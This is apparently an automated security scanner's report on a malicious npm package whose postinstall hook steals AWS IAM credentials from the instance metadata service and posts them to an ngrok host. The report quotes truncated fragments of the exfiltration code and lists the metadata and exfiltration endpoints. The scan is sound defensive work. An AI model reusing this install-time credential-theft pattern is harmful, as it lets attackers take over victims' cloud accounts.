AI Security Review
scanned 4h ago · by lpm-firewall-aiThe package contains an automatic install-time credential theft routine in package.json. It targets AWS instance metadata credentials and exfiltrates results to an ngrok host.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install or any install path that runs postinstall
Impact
Steals cloud IAM role credentials from hosts with reachable AWS metadata service.
Mechanism
install-time AWS metadata credential exfiltration
Attack narrative
On npm install, the postinstall script runs inline Node code. It obtains an AWS IMDSv2 token from 169.254.169.254, queries the IAM security-credentials metadata path for a role name, retrieves that role's credentials, then POSTs the role and credential response to crabbing-thong-overhung.ngrok-free.dev. Error paths also beacon status to the same exfiltration host.
Rationale
Direct source inspection confirms automatic postinstall access to AWS metadata credentials and outbound exfiltration to an unrelated ngrok endpoint. This is concrete credential theft with no package-aligned purpose.
Evidence
package.jsonpackage.json#scripts.postinstall
Network endpoints3
169.254.169.254/latest/api/token169.254.169.254/latest/meta-data/iam/security-credentials/crabbing-thong-overhung.ngrok-free.dev/?real_aws_keys=1
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- package.json is the only package file and defines a postinstall lifecycle hook.
- package.json postinstall runs node -e at install time.
- Script requests AWS IMDSv2 token from 169.254.169.254/latest/api/token.
- Script reads IAM role and credentials from /latest/meta-data/iam/security-credentials/.
- Script POSTs collected role/creds or status data to crabbing-thong-overhung.ngrok-free.dev/?real_aws_keys=1.
Evidence against
- No benign package code, README, main entrypoint, or package-aligned functionality present.
- No user-invoked command gating; behavior is automatic during npm install.
Behavioral surface
NoLicense
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node -e "const http=require('http'),https=require('https');function exfil(d){let b=JSON.stringify(d);let r=https.request({hostname:'crabbing-thong-overhung.ngrok-free.dev',path:'/?...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkg•scripts.postinstall = node -e "const http=require('http'),https=require('https');function exfil(d){let b=JSON.stringify(d);let r=https.request({hostname:'crabbing-thong-overhung.ngrok-free.dev',path:'/?...
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgpackage.json#scripts.postinstallView file
1"const http=require('http'),https=require('https');function exfil(d){let b=JSON.stringify(d);let r=https.request({hostname:'crabbing-thong-overhung.ngrok-free.dev',path:'/?real_aws...
High
Cloud Metadata Access
Source reaches cloud instance metadata or link-local credential endpoints.
package.json#scripts.postinstallView on unpkg · L1Findings
1 Critical2 High2 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
HighCloud Metadata Accesspackage.json#scripts.postinstall
LowScripts Present
LowNo License